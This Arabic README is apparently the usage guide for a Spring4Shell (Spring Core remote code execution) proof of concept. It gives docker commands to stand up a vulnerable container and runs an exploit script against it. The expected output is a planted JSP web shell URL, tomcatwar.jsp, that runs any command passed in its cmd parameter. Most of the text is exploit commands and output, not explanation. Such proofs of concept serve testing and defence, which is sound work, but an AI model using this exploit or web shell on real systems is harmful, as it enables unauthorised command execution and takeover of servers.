
أخرى spring4shell (Spring core RCE) POC
تؤثر هذه الثغرة على Spring Core وتسمح للمهاجم بإرسال طلب HTTP مصمم خصيصًا لتجاوز الحماية في محلل طلبات HTTP في المكتبة، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.
مزيد من المعلومات هنا

لاستغلال هذه الثغرة، يجب توفر عدة شروط
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
الاستجابة المتوقعة
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
إذا قمت بالوصول إلى هذا الرابط، فسيتم تشغيل أي أمر تريده cmd=<whatyouwant>

إذا قمت بتسجيل الدخول عبر SSH إلى الحاوية، سترى أنه تم إنشاء ملف جديد tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT